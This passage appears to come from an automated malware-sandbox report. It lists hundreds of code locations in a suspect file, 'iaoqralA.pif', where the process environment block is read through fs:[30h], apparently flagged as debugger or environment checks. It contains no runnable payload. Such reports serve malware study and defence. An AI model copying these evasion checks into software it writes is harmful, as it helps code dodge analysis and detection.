                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D55060 mov eax, dword ptr fs:[00000030h]17_2_30D55060
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C91070 mov eax, dword ptr fs:[00000030h]17_2_30C91070
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C91070 mov ecx, dword ptr fs:[00000030h]17_2_30C91070
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C91070 mov eax, dword ptr fs:[00000030h]17_2_30C91070
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C91070 mov eax, dword ptr fs:[00000030h]17_2_30C91070
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C91070 mov eax, dword ptr fs:[00000030h]17_2_30C91070
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C91070 mov eax, dword ptr fs:[00000030h]17_2_30C91070
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C91070 mov eax, dword ptr fs:[00000030h]17_2_30C91070
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C91070 mov eax, dword ptr fs:[00000030h]17_2_30C91070
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C91070 mov eax, dword ptr fs:[00000030h]17_2_30C91070
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C91070 mov eax, dword ptr fs:[00000030h]17_2_30C91070
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C91070 mov eax, dword ptr fs:[00000030h]17_2_30C91070
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C91070 mov eax, dword ptr fs:[00000030h]17_2_30C91070
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C91070 mov eax, dword ptr fs:[00000030h]17_2_30C91070
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAC073 mov eax, dword ptr fs:[00000030h]17_2_30CAC073
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CFD070 mov ecx, dword ptr fs:[00000030h]17_2_30CFD070
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C9E016 mov eax, dword ptr fs:[00000030h]17_2_30C9E016
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C9E016 mov eax, dword ptr fs:[00000030h]17_2_30C9E016
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C9E016 mov eax, dword ptr fs:[00000030h]17_2_30C9E016
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C9E016 mov eax, dword ptr fs:[00000030h]17_2_30C9E016
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7A020 mov eax, dword ptr fs:[00000030h]17_2_30C7A020
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7C020 mov eax, dword ptr fs:[00000030h]17_2_30C7C020
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D4903E mov eax, dword ptr fs:[00000030h]17_2_30D4903E
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D4903E mov eax, dword ptr fs:[00000030h]17_2_30D4903E
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D4903E mov eax, dword ptr fs:[00000030h]17_2_30D4903E
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D4903E mov eax, dword ptr fs:[00000030h]17_2_30D4903E
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D461C3 mov eax, dword ptr fs:[00000030h]17_2_30D461C3
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D461C3 mov eax, dword ptr fs:[00000030h]17_2_30D461C3
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CBD1D0 mov eax, dword ptr fs:[00000030h]17_2_30CBD1D0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CBD1D0 mov ecx, dword ptr fs:[00000030h]17_2_30CBD1D0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D551CB mov eax, dword ptr fs:[00000030h]17_2_30D551CB
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA51EF mov eax, dword ptr fs:[00000030h]17_2_30CA51EF
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA51EF mov eax, dword ptr fs:[00000030h]17_2_30CA51EF
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA51EF mov eax, dword ptr fs:[00000030h]17_2_30CA51EF
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA51EF mov eax, dword ptr fs:[00000030h]17_2_30CA51EF
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA51EF mov eax, dword ptr fs:[00000030h]17_2_30CA51EF
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA51EF mov eax, dword ptr fs:[00000030h]17_2_30CA51EF
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA51EF mov eax, dword ptr fs:[00000030h]17_2_30CA51EF
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA51EF mov eax, dword ptr fs:[00000030h]17_2_30CA51EF
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA51EF mov eax, dword ptr fs:[00000030h]17_2_30CA51EF
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA51EF mov eax, dword ptr fs:[00000030h]17_2_30CA51EF
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA51EF mov eax, dword ptr fs:[00000030h]17_2_30CA51EF
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA51EF mov eax, dword ptr fs:[00000030h]17_2_30CA51EF
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA51EF mov eax, dword ptr fs:[00000030h]17_2_30CA51EF
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C851ED mov eax, dword ptr fs:[00000030h]17_2_30C851ED
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D561E5 mov eax, dword ptr fs:[00000030h]17_2_30D561E5
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB01F8 mov eax, dword ptr fs:[00000030h]17_2_30CB01F8
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC0185 mov eax, dword ptr fs:[00000030h]17_2_30CC0185
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D0019F mov eax, dword ptr fs:[00000030h]17_2_30D0019F
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D0019F mov eax, dword ptr fs:[00000030h]17_2_30D0019F
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D0019F mov eax, dword ptr fs:[00000030h]17_2_30D0019F
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D0019F mov eax, dword ptr fs:[00000030h]17_2_30D0019F
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7A197 mov eax, dword ptr fs:[00000030h]17_2_30C7A197
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7A197 mov eax, dword ptr fs:[00000030h]17_2_30C7A197
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7A197 mov eax, dword ptr fs:[00000030h]17_2_30C7A197
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D3C188 mov eax, dword ptr fs:[00000030h]17_2_30D3C188
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D3C188 mov eax, dword ptr fs:[00000030h]17_2_30D3C188
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CD7190 mov eax, dword ptr fs:[00000030h]17_2_30CD7190
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D311A4 mov eax, dword ptr fs:[00000030h]17_2_30D311A4
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D311A4 mov eax, dword ptr fs:[00000030h]17_2_30D311A4
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D311A4 mov eax, dword ptr fs:[00000030h]17_2_30D311A4
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D311A4 mov eax, dword ptr fs:[00000030h]17_2_30D311A4
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C9B1B0 mov eax, dword ptr fs:[00000030h]17_2_30C9B1B0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D55152 mov eax, dword ptr fs:[00000030h]17_2_30D55152
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C79148 mov eax, dword ptr fs:[00000030h]17_2_30C79148
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C79148 mov eax, dword ptr fs:[00000030h]17_2_30C79148
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C79148 mov eax, dword ptr fs:[00000030h]17_2_30C79148
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C79148 mov eax, dword ptr fs:[00000030h]17_2_30C79148
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7C156 mov eax, dword ptr fs:[00000030h]17_2_30C7C156
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D14144 mov eax, dword ptr fs:[00000030h]17_2_30D14144
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D14144 mov eax, dword ptr fs:[00000030h]17_2_30D14144
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D14144 mov ecx, dword ptr fs:[00000030h]17_2_30D14144
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D14144 mov eax, dword ptr fs:[00000030h]17_2_30D14144
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D14144 mov eax, dword ptr fs:[00000030h]17_2_30D14144
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C87152 mov eax, dword ptr fs:[00000030h]17_2_30C87152
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C86154 mov eax, dword ptr fs:[00000030h]17_2_30C86154
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C86154 mov eax, dword ptr fs:[00000030h]17_2_30C86154
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D19179 mov eax, dword ptr fs:[00000030h]17_2_30D19179
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7F172 mov eax, dword ptr fs:[00000030h]17_2_30C7F172
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D40115 mov eax, dword ptr fs:[00000030h]17_2_30D40115
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D2A118 mov ecx, dword ptr fs:[00000030h]17_2_30D2A118
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D2A118 mov eax, dword ptr fs:[00000030h]17_2_30D2A118
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D2A118 mov eax, dword ptr fs:[00000030h]17_2_30D2A118
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D2A118 mov eax, dword ptr fs:[00000030h]17_2_30D2A118
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB0124 mov eax, dword ptr fs:[00000030h]17_2_30CB0124
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7B136 mov eax, dword ptr fs:[00000030h]17_2_30C7B136
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7B136 mov eax, dword ptr fs:[00000030h]17_2_30C7B136
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7B136 mov eax, dword ptr fs:[00000030h]17_2_30C7B136
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7B136 mov eax, dword ptr fs:[00000030h]17_2_30C7B136
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C81131 mov eax, dword ptr fs:[00000030h]17_2_30C81131
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C81131 mov eax, dword ptr fs:[00000030h]17_2_30C81131
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAB2C0 mov eax, dword ptr fs:[00000030h]17_2_30CAB2C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAB2C0 mov eax, dword ptr fs:[00000030h]17_2_30CAB2C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAB2C0 mov eax, dword ptr fs:[00000030h]17_2_30CAB2C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAB2C0 mov eax, dword ptr fs:[00000030h]17_2_30CAB2C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAB2C0 mov eax, dword ptr fs:[00000030h]17_2_30CAB2C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAB2C0 mov eax, dword ptr fs:[00000030h]17_2_30CAB2C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAB2C0 mov eax, dword ptr fs:[00000030h]17_2_30CAB2C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8A2C3 mov eax, dword ptr fs:[00000030h]17_2_30C8A2C3
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8A2C3 mov eax, dword ptr fs:[00000030h]17_2_30C8A2C3
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8A2C3 mov eax, dword ptr fs:[00000030h]17_2_30C8A2C3
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8A2C3 mov eax, dword ptr fs:[00000030h]17_2_30C8A2C3
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8A2C3 mov eax, dword ptr fs:[00000030h]17_2_30C8A2C3
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C892C5 mov eax, dword ptr fs:[00000030h]17_2_30C892C5
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C892C5 mov eax, dword ptr fs:[00000030h]17_2_30C892C5
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7B2D3 mov eax, dword ptr fs:[00000030h]17_2_30C7B2D3
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7B2D3 mov eax, dword ptr fs:[00000030h]17_2_30C7B2D3
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7B2D3 mov eax, dword ptr fs:[00000030h]17_2_30C7B2D3
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAF2D0 mov eax, dword ptr fs:[00000030h]17_2_30CAF2D0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CAF2D0 mov eax, dword ptr fs:[00000030h]17_2_30CAF2D0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C902E1 mov eax, dword ptr fs:[00000030h]17_2_30C902E1
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C902E1 mov eax, dword ptr fs:[00000030h]17_2_30C902E1
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C902E1 mov eax, dword ptr fs:[00000030h]17_2_30C902E1
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D3F2F8 mov eax, dword ptr fs:[00000030h]17_2_30D3F2F8
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D552E2 mov eax, dword ptr fs:[00000030h]17_2_30D552E2
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C792FF mov eax, dword ptr fs:[00000030h]17_2_30C792FF
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D312ED mov eax, dword ptr fs:[00000030h]17_2_30D312ED
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D312ED mov eax, dword ptr fs:[00000030h]17_2_30D312ED
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D312ED mov eax, dword ptr fs:[00000030h]17_2_30D312ED
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D312ED mov eax, dword ptr fs:[00000030h]17_2_30D312ED
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D312ED mov eax, dword ptr fs:[00000030h]17_2_30D312ED
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D312ED mov eax, dword ptr fs:[00000030h]17_2_30D312ED
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D312ED mov eax, dword ptr fs:[00000030h]17_2_30D312ED
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D312ED mov eax, dword ptr fs:[00000030h]17_2_30D312ED
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D312ED mov eax, dword ptr fs:[00000030h]17_2_30D312ED
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D312ED mov eax, dword ptr fs:[00000030h]17_2_30D312ED
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D312ED mov eax, dword ptr fs:[00000030h]17_2_30D312ED
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D312ED mov eax, dword ptr fs:[00000030h]17_2_30D312ED
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D312ED mov eax, dword ptr fs:[00000030h]17_2_30D312ED
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D312ED mov eax, dword ptr fs:[00000030h]17_2_30D312ED
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CBE284 mov eax, dword ptr fs:[00000030h]17_2_30CBE284
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CBE284 mov eax, dword ptr fs:[00000030h]17_2_30CBE284
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D00283 mov eax, dword ptr fs:[00000030h]17_2_30D00283
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D00283 mov eax, dword ptr fs:[00000030h]17_2_30D00283
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D00283 mov eax, dword ptr fs:[00000030h]17_2_30D00283
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB329E mov eax, dword ptr fs:[00000030h]17_2_30CB329E
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB329E mov eax, dword ptr fs:[00000030h]17_2_30CB329E
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D55283 mov eax, dword ptr fs:[00000030h]17_2_30D55283
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C902A0 mov eax, dword ptr fs:[00000030h]17_2_30C902A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C902A0 mov eax, dword ptr fs:[00000030h]17_2_30C902A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C952A0 mov eax, dword ptr fs:[00000030h]17_2_30C952A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C952A0 mov eax, dword ptr fs:[00000030h]17_2_30C952A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C952A0 mov eax, dword ptr fs:[00000030h]17_2_30C952A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C952A0 mov eax, dword ptr fs:[00000030h]17_2_30C952A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D092BC mov eax, dword ptr fs:[00000030h]17_2_30D092BC
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D092BC mov eax, dword ptr fs:[00000030h]17_2_30D092BC
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D092BC mov ecx, dword ptr fs:[00000030h]17_2_30D092BC
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D092BC mov ecx, dword ptr fs:[00000030h]17_2_30D092BC
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D172A0 mov eax, dword ptr fs:[00000030h]17_2_30D172A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D172A0 mov eax, dword ptr fs:[00000030h]17_2_30D172A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D162A0 mov eax, dword ptr fs:[00000030h]17_2_30D162A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D162A0 mov ecx, dword ptr fs:[00000030h]17_2_30D162A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D162A0 mov eax, dword ptr fs:[00000030h]17_2_30D162A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D162A0 mov eax, dword ptr fs:[00000030h]17_2_30D162A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D162A0 mov eax, dword ptr fs:[00000030h]17_2_30D162A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D162A0 mov eax, dword ptr fs:[00000030h]17_2_30D162A0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D492A6 mov eax, dword ptr fs:[00000030h]17_2_30D492A6
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D492A6 mov eax, dword ptr fs:[00000030h]17_2_30D492A6
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D492A6 mov eax, dword ptr fs:[00000030h]17_2_30D492A6
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D492A6 mov eax, dword ptr fs:[00000030h]17_2_30D492A6
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D3B256 mov eax, dword ptr fs:[00000030h]17_2_30D3B256
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D3B256 mov eax, dword ptr fs:[00000030h]17_2_30D3B256
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB724D mov eax, dword ptr fs:[00000030h]17_2_30CB724D
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C79240 mov eax, dword ptr fs:[00000030h]17_2_30C79240
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C79240 mov eax, dword ptr fs:[00000030h]17_2_30C79240
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C86259 mov eax, dword ptr fs:[00000030h]17_2_30C86259
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7A250 mov eax, dword ptr fs:[00000030h]17_2_30C7A250
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D30274 mov eax, dword ptr fs:[00000030h]17_2_30D30274
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D30274 mov eax, dword ptr fs:[00000030h]17_2_30D30274
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D30274 mov eax, dword ptr fs:[00000030h]17_2_30D30274
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D30274 mov eax, dword ptr fs:[00000030h]17_2_30D30274
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D30274 mov eax, dword ptr fs:[00000030h]17_2_30D30274
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D30274 mov eax, dword ptr fs:[00000030h]17_2_30D30274
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D30274 mov eax, dword ptr fs:[00000030h]17_2_30D30274
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D30274 mov eax, dword ptr fs:[00000030h]17_2_30D30274
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D30274 mov eax, dword ptr fs:[00000030h]17_2_30D30274
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D30274 mov eax, dword ptr fs:[00000030h]17_2_30D30274
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D30274 mov eax, dword ptr fs:[00000030h]17_2_30D30274
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D30274 mov eax, dword ptr fs:[00000030h]17_2_30D30274
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C84260 mov eax, dword ptr fs:[00000030h]17_2_30C84260
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C84260 mov eax, dword ptr fs:[00000030h]17_2_30C84260
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C84260 mov eax, dword ptr fs:[00000030h]17_2_30C84260
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7826B mov eax, dword ptr fs:[00000030h]17_2_30C7826B
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC1270 mov eax, dword ptr fs:[00000030h]17_2_30CC1270
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CC1270 mov eax, dword ptr fs:[00000030h]17_2_30CC1270
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CA9274 mov eax, dword ptr fs:[00000030h]17_2_30CA9274
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D4D26B mov eax, dword ptr fs:[00000030h]17_2_30D4D26B
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D4D26B mov eax, dword ptr fs:[00000030h]17_2_30D4D26B
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB7208 mov eax, dword ptr fs:[00000030h]17_2_30CB7208
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30CB7208 mov eax, dword ptr fs:[00000030h]17_2_30CB7208
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D55227 mov eax, dword ptr fs:[00000030h]17_2_30D55227
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C7823B mov eax, dword ptr fs:[00000030h]17_2_30C7823B
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30D3B3D0 mov ecx, dword ptr fs:[00000030h]17_2_30D3B3D0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8A3C0 mov eax, dword ptr fs:[00000030h]17_2_30C8A3C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8A3C0 mov eax, dword ptr fs:[00000030h]17_2_30C8A3C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8A3C0 mov eax, dword ptr fs:[00000030h]17_2_30C8A3C0
                        Source: C:\Users\user\Links\iaoqralA.pifCode function: 17_2_30C8A3C0 mov eax, dword ptr fs:[00000030h]17_2_30C8A3C0
